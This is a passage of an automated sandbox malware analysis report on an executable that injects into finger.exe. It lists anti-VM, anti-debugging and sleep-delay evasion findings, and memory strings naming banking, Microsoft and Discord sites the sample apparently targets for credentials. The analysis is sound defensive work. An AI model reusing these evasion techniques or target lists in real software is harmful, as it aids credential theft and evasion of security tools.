                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: wSoShbuXnJ.exe PID: 7440, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FF8418CD324
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FF8418CD7E4
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FF8418CD944
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FF8418CD504
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FF8418CD544
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FF8418CD1E4
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FF8418D0154
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FF8418CDA44
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeMemory allocated: C70000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeMemory allocated: 2610000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeMemory allocated: 4610000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeMemory allocated: 8C80000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeMemory allocated: 69C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeMemory allocated: 9C80000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeMemory allocated: 7520000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0151096E rdtsc 8_2_0151096E
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\finger.exeAPI coverage: 2.6 %
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exe TID: 7476Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\finger.exe TID: 5908Thread sleep count: 38 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\finger.exe TID: 5908Thread sleep time: -76000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe TID: 6252Thread sleep time: -55000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe TID: 6252Thread sleep time: -31500s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\finger.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0294C7B0 FindFirstFileW,FindNextFileW,FindClose,11_2_0294C7B0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: 40F193-3PQ.11.drBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
                Source: 40F193-3PQ.11.drBinary or memory string: tasks.office.comVMware20,11696501413o
                Source: 40F193-3PQ.11.drBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
                Source: 40F193-3PQ.11.drBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
                Source: 40F193-3PQ.11.drBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
                Source: 40F193-3PQ.11.drBinary or memory string: dev.azure.comVMware20,11696501413j
                Source: 40F193-3PQ.11.drBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
                Source: 40F193-3PQ.11.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
                Source: finger.exe, 0000000B.00000002.3143595877.0000000007D23000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.comVMware20,1169650
                Source: 40F193-3PQ.11.drBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
                Source: wSoShbuXnJ.exe, 00000005.00000002.1429535286.00000000067F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: cZnoVmci1j
                Source: 40F193-3PQ.11.drBinary or memory string: bankofamerica.comVMware20,11696501413x
                Source: 40F193-3PQ.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
                Source: finger.exe, 0000000B.00000002.3143595877.0000000007D23000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,116965x~t
                Source: finger.exe, 0000000B.00000002.3143595877.0000000007D23000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696501413G~[
                Source: 40F193-3PQ.11.drBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
                Source: finger.exe, 0000000B.00000002.3143595877.0000000007D23000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11
                Source: finger.exe, 0000000B.00000002.3143595877.0000000007D23000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,1169650141
                Source: finger.exe, 0000000B.00000002.3143595877.0000000007D23000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ive userers - GDCDYNVMware20,11696501413p
                Source: 40F193-3PQ.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
                Source: 40F193-3PQ.11.drBinary or memory string: turbotax.intuit.comVMware20,11696501413t
                Source: finger.exe, 0000000B.00000002.3138314418.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2082941547.0000020532DBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 40F193-3PQ.11.drBinary or memory string: Interactive userers - HKVMware20,11696501413]
                Source: finger.exe, 0000000B.00000002.3143595877.0000000007D23000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rs - EU East & CentralVMware20,11696501413
                Source: 40F193-3PQ.11.drBinary or memory string: outlook.office.comVMware20,11696501413s
                Source: 40F193-3PQ.11.drBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
                Source: RAdsmABlJtKpzt.exe, 0000000C.00000002.3139849236.00000000013EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllw
                Source: 40F193-3PQ.11.drBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
                Source: 40F193-3PQ.11.drBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
                Source: 40F193-3PQ.11.drBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
                Source: 40F193-3PQ.11.drBinary or memory string: ms.portal.azure.comVMware20,11696501413
                Source: 40F193-3PQ.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
                Source: 40F193-3PQ.11.drBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
                Source: 40F193-3PQ.11.drBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
                Source: 40F193-3PQ.11.drBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
                Source: 40F193-3PQ.11.drBinary or memory string: outlook.office365.comVMware20,11696501413t
                Source: 40F193-3PQ.11.drBinary or memory string: global block list test formVMware20,11696501413
                Source: 40F193-3PQ.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
                Source: 40F193-3PQ.11.drBinary or memory string: interactiveuserers.comVMware20,11696501413
                Source: 40F193-3PQ.11.drBinary or memory string: discord.comVMware20,11696501413f
                Source: finger.exe, 0000000B.00000002.3143595877.0000000007D23000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696
                Source: 40F193-3PQ.11.drBinary or memory string: AMC password management pageVMware20,11696501413
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0151096E rdtsc 8_2_0151096E
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_00417813 LdrLoadDll,8_2_00417813
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01568158 mov eax, dword ptr fs:[00000030h]8_2_01568158
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01564144 mov eax, dword ptr fs:[00000030h]8_2_01564144
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01564144 mov eax, dword ptr fs:[00000030h]8_2_01564144
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01564144 mov ecx, dword ptr fs:[00000030h]8_2_01564144
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01564144 mov eax, dword ptr fs:[00000030h]8_2_01564144
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01564144 mov eax, dword ptr fs:[00000030h]8_2_01564144
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D6154 mov eax, dword ptr fs:[00000030h]8_2_014D6154
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D6154 mov eax, dword ptr fs:[00000030h]8_2_014D6154
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014CC156 mov eax, dword ptr fs:[00000030h]8_2_014CC156
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015A4164 mov eax, dword ptr fs:[00000030h]8_2_015A4164
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015A4164 mov eax, dword ptr fs:[00000030h]8_2_015A4164
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01590115 mov eax, dword ptr fs:[00000030h]8_2_01590115
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0157A118 mov ecx, dword ptr fs:[00000030h]8_2_0157A118
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0157A118 mov eax, dword ptr fs:[00000030h]8_2_0157A118
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0157A118 mov eax, dword ptr fs:[00000030h]8_2_0157A118
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0157A118 mov eax, dword ptr fs:[00000030h]8_2_0157A118
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0157E10E mov eax, dword ptr fs:[00000030h]8_2_0157E10E
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0157E10E mov ecx, dword ptr fs:[00000030h]8_2_0157E10E
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0157E10E mov eax, dword ptr fs:[00000030h]8_2_0157E10E
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0157E10E mov eax, dword ptr fs:[00000030h]8_2_0157E10E
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0157E10E mov ecx, dword ptr fs:[00000030h]8_2_0157E10E
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0157E10E mov eax, dword ptr fs:[00000030h]8_2_0157E10E
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0157E10E mov eax, dword ptr fs:[00000030h]8_2_0157E10E
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0157E10E mov ecx, dword ptr fs:[00000030h]8_2_0157E10E
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0157E10E mov eax, dword ptr fs:[00000030h]8_2_0157E10E
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0157E10E mov ecx, dword ptr fs:[00000030h]8_2_0157E10E
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01500124 mov eax, dword ptr fs:[00000030h]8_2_01500124
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0154E1D0 mov eax, dword ptr fs:[00000030h]8_2_0154E1D0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0154E1D0 mov eax, dword ptr fs:[00000030h]8_2_0154E1D0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0154E1D0 mov ecx, dword ptr fs:[00000030h]8_2_0154E1D0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0154E1D0 mov eax, dword ptr fs:[00000030h]8_2_0154E1D0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0154E1D0 mov eax, dword ptr fs:[00000030h]8_2_0154E1D0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015961C3 mov eax, dword ptr fs:[00000030h]8_2_015961C3
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015961C3 mov eax, dword ptr fs:[00000030h]8_2_015961C3
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015001F8 mov eax, dword ptr fs:[00000030h]8_2_015001F8
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015A61E5 mov eax, dword ptr fs:[00000030h]8_2_015A61E5
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0155019F mov eax, dword ptr fs:[00000030h]8_2_0155019F
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0155019F mov eax, dword ptr fs:[00000030h]8_2_0155019F
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0155019F mov eax, dword ptr fs:[00000030h]8_2_0155019F
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0155019F mov eax, dword ptr fs:[00000030h]8_2_0155019F
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0158C188 mov eax, dword ptr fs:[00000030h]8_2_0158C188
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0158C188 mov eax, dword ptr fs:[00000030h]8_2_0158C188
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01510185 mov eax, dword ptr fs:[00000030h]8_2_01510185
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01574180 mov eax, dword ptr fs:[00000030h]8_2_01574180
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01574180 mov eax, dword ptr fs:[00000030h]8_2_01574180
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014CA197 mov eax, dword ptr fs:[00000030h]8_2_014CA197
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014CA197 mov eax, dword ptr fs:[00000030h]8_2_014CA197
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014CA197 mov eax, dword ptr fs:[00000030h]8_2_014CA197
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01556050 mov eax, dword ptr fs:[00000030h]8_2_01556050
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D2050 mov eax, dword ptr fs:[00000030h]8_2_014D2050
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014FC073 mov eax, dword ptr fs:[00000030h]8_2_014FC073
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01554000 mov ecx, dword ptr fs:[00000030h]8_2_01554000
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01572000 mov eax, dword ptr fs:[00000030h]8_2_01572000
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01572000 mov eax, dword ptr fs:[00000030h]8_2_01572000
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01572000 mov eax, dword ptr fs:[00000030h]8_2_01572000
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01572000 mov eax, dword ptr fs:[00000030h]8_2_01572000
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01572000 mov eax, dword ptr fs:[00000030h]8_2_01572000
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01572000 mov eax, dword ptr fs:[00000030h]8_2_01572000
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01572000 mov eax, dword ptr fs:[00000030h]8_2_01572000
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01572000 mov eax, dword ptr fs:[00000030h]8_2_01572000
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014EE016 mov eax, dword ptr fs:[00000030h]8_2_014EE016
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014EE016 mov eax, dword ptr fs:[00000030h]8_2_014EE016
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014EE016 mov eax, dword ptr fs:[00000030h]8_2_014EE016
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014EE016 mov eax, dword ptr fs:[00000030h]8_2_014EE016
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01566030 mov eax, dword ptr fs:[00000030h]8_2_01566030
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014CA020 mov eax, dword ptr fs:[00000030h]8_2_014CA020
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014CC020 mov eax, dword ptr fs:[00000030h]8_2_014CC020
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015520DE mov eax, dword ptr fs:[00000030h]8_2_015520DE
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015120F0 mov ecx, dword ptr fs:[00000030h]8_2_015120F0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D80E9 mov eax, dword ptr fs:[00000030h]8_2_014D80E9
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014CA0E3 mov ecx, dword ptr fs:[00000030h]8_2_014CA0E3
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015560E0 mov eax, dword ptr fs:[00000030h]8_2_015560E0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014CC0F0 mov eax, dword ptr fs:[00000030h]8_2_014CC0F0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D208A mov eax, dword ptr fs:[00000030h]8_2_014D208A
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015960B8 mov eax, dword ptr fs:[00000030h]8_2_015960B8
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015960B8 mov ecx, dword ptr fs:[00000030h]8_2_015960B8
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014C80A0 mov eax, dword ptr fs:[00000030h]8_2_014C80A0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015680A8 mov eax, dword ptr fs:[00000030h]8_2_015680A8
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01578350 mov ecx, dword ptr fs:[00000030h]8_2_01578350
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0155035C mov eax, dword ptr fs:[00000030h]8_2_0155035C
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0155035C mov eax, dword ptr fs:[00000030h]8_2_0155035C
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0155035C mov eax, dword ptr fs:[00000030h]8_2_0155035C
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0155035C mov ecx, dword ptr fs:[00000030h]8_2_0155035C
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0155035C mov eax, dword ptr fs:[00000030h]8_2_0155035C
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0155035C mov eax, dword ptr fs:[00000030h]8_2_0155035C
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0159A352 mov eax, dword ptr fs:[00000030h]8_2_0159A352
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015A634F mov eax, dword ptr fs:[00000030h]8_2_015A634F
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01552349 mov eax, dword ptr fs:[00000030h]8_2_01552349
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01552349 mov eax, dword ptr fs:[00000030h]8_2_01552349
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01552349 mov eax, dword ptr fs:[00000030h]8_2_01552349
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01552349 mov eax, dword ptr fs:[00000030h]8_2_01552349
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01552349 mov eax, dword ptr fs:[00000030h]8_2_01552349
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01552349 mov eax, dword ptr fs:[00000030h]8_2_01552349
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01552349 mov eax, dword ptr fs:[00000030h]8_2_01552349
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01552349 mov eax, dword ptr fs:[00000030h]8_2_01552349
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01552349 mov eax, dword ptr fs:[00000030h]8_2_01552349
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01552349 mov eax, dword ptr fs:[00000030h]8_2_01552349
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01552349 mov eax, dword ptr fs:[00000030h]8_2_01552349
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01552349 mov eax, dword ptr fs:[00000030h]8_2_01552349
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01552349 mov eax, dword ptr fs:[00000030h]8_2_01552349
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01552349 mov eax, dword ptr fs:[00000030h]8_2_01552349
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01552349 mov eax, dword ptr fs:[00000030h]8_2_01552349
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0157437C mov eax, dword ptr fs:[00000030h]8_2_0157437C
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150A30B mov eax, dword ptr fs:[00000030h]8_2_0150A30B
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150A30B mov eax, dword ptr fs:[00000030h]8_2_0150A30B
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150A30B mov eax, dword ptr fs:[00000030h]8_2_0150A30B
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014CC310 mov ecx, dword ptr fs:[00000030h]8_2_014CC310
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014F0310 mov ecx, dword ptr fs:[00000030h]8_2_014F0310
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015A8324 mov eax, dword ptr fs:[00000030h]8_2_015A8324
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015A8324 mov ecx, dword ptr fs:[00000030h]8_2_015A8324
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015A8324 mov eax, dword ptr fs:[00000030h]8_2_015A8324
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015A8324 mov eax, dword ptr fs:[00000030h]8_2_015A8324
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015743D4 mov eax, dword ptr fs:[00000030h]8_2_015743D4
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015743D4 mov eax, dword ptr fs:[00000030h]8_2_015743D4
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0157E3DB mov eax, dword ptr fs:[00000030h]8_2_0157E3DB
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0157E3DB mov eax, dword ptr fs:[00000030h]8_2_0157E3DB
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0157E3DB mov ecx, dword ptr fs:[00000030h]8_2_0157E3DB
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0157E3DB mov eax, dword ptr fs:[00000030h]8_2_0157E3DB
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014DA3C0 mov eax, dword ptr fs:[00000030h]8_2_014DA3C0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014DA3C0 mov eax, dword ptr fs:[00000030h]8_2_014DA3C0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014DA3C0 mov eax, dword ptr fs:[00000030h]8_2_014DA3C0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014DA3C0 mov eax, dword ptr fs:[00000030h]8_2_014DA3C0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014DA3C0 mov eax, dword ptr fs:[00000030h]8_2_014DA3C0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014DA3C0 mov eax, dword ptr fs:[00000030h]8_2_014DA3C0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D83C0 mov eax, dword ptr fs:[00000030h]8_2_014D83C0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D83C0 mov eax, dword ptr fs:[00000030h]8_2_014D83C0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D83C0 mov eax, dword ptr fs:[00000030h]8_2_014D83C0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D83C0 mov eax, dword ptr fs:[00000030h]8_2_014D83C0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0158C3CD mov eax, dword ptr fs:[00000030h]8_2_0158C3CD
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E03E9 mov eax, dword ptr fs:[00000030h]8_2_014E03E9
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E03E9 mov eax, dword ptr fs:[00000030h]8_2_014E03E9
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E03E9 mov eax, dword ptr fs:[00000030h]8_2_014E03E9
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E03E9 mov eax, dword ptr fs:[00000030h]8_2_014E03E9
